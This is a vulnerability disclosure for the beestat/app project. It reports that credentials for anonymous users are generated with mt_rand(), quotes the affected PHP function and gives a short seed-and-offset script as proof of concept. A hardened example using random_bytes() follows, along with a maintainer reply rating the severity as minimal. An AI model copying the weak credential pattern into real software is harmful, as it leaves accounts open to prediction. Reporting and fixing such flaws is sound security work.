Use of Predictable Algorithm in Random Number Generator in beestat/app
Valid
Reported on Jul 3rd 2021
✍️ Description
The random number generator implemented by mt_rand() cannot withstand a cryptographic attack.
In this case the function that generates weak random numbers is mt_rand() in user.php at line 58.
🕵️♂️ Proof of Concept
Vulnerable Code
  /**
   * Create an anonymous user so we can log in and have access to everything
   * without having to spend the time creating an actual user.
   */
  public function create_anonymous_user() {
    $username = strtolower(sha1(uniqid(mt_rand(), true))); //mt_rand used
    $password = strtolower(sha1(uniqid(mt_rand(), true))); //mt_rand used
    $user = $this->create([
      'username' => $username,
      'password' => $password,
      'anonymous' => 1
    ]);
    $this->force_log_in($user['user_id']);
  }
POC
#POC.php
#!/usr/bin/env php
<?php
// Print usage when the seed or the offset argument is missing.
if($argc < 3)
{
    print($argv[0] . ' <seed> <offset>' . "\n");
    print('' . "\n");
    print('Parameters:' . "\n");
    print(' seed: Seed to initialize mt_rand() with' . "\n");
    print(' offset: Number of calls to mt_rand() before printing the first');
    print(' output' . "\n");
    print('' . "\n");
    print('Output:' . "\n");
    print(' <offset>\'s call to mt_rand() and <offset+227>\'s call');
    print(' to mt_rand()' . "\n");
    exit();
}

// Seed the generator explicitly so the sequence is reproducible.
mt_srand((int) $argv[1]);

// Discard the first <offset> outputs.
for($i = 0; $i < (int) $argv[2]; $i++)
    mt_rand();
print mt_rand() . " ";

// Discard 226 more outputs, then print the call at <offset+227>.
for($i = 0; $i < 226; $i++)
    mt_rand();
print mt_rand() . "\n";
💥 Impact
An attacker can predict the possible anonymous usernames and passwords with full access.
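A hardened counterpart to the vulnerable snippet, as an added example that is not part of the report or of beestat's code: `weak_credential()`, `strong_credential()` and `mt_sequence()` are hypothetical names, and the seed 1234 is a constructed value. It shows that mt_rand() output replays for a known seed, while random_bytes() yields a value of the same 40-character hex shape from the operating system's CSPRNG.

```php
<?php
// Added example: function names below are hypothetical, not beestat code.

/** Pattern from the report: mt_rand() + uniqid(), hashed with sha1(). */
function weak_credential(): string
{
    // sha1() only reshapes its input; it adds no unpredictability.
    // uniqid() is built from the current time and is documented as not
    // cryptographically secure.
    return strtolower(sha1(uniqid((string) mt_rand(), true)));
}

/** Replacement: 20 bytes (160 bits) from the OS CSPRNG, hex-encoded. */
function strong_credential(int $bytes = 20): string
{
    // random_bytes() throws if no secure source is available, so a
    // failure cannot silently fall back to weak output.
    return bin2hex(random_bytes($bytes));
}

/** Return the first $count mt_rand() outputs for a given seed. */
function mt_sequence(int $seed, int $count): array
{
    mt_srand($seed);
    $out = [];
    for ($i = 0; $i < $count; $i++) {
        $out[] = mt_rand();
    }
    return $out;
}

// Constructed seed value, used only to show determinism.
$first  = mt_sequence(1234, 3);
$second = mt_sequence(1234, 3);
echo 'mt_rand() replays for equal seeds: ';
var_dump($first === $second);

mt_srand(); // restore random seeding before any further mt_rand() use

$weak   = weak_credential();
$strong = strong_credential();
// Both are 40 lowercase hex characters, so the stored format is unchanged.
echo "weak:   $weak\n";
echo "strong: $strong\n";
var_dump(strlen($weak) === strlen($strong));
```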
We have contacted a member of the beestat/app team and are waiting to hear back
2 years ago
These values are in the database to satisfy some other requirements, but this type of authentication is never used for anything. I'll mark this as valid since I could generate the random data more securely but the severity is minimal.
The fix bounty has been dropped
This vulnerability will not receive a CVE
user.php#L58-L59 has been validated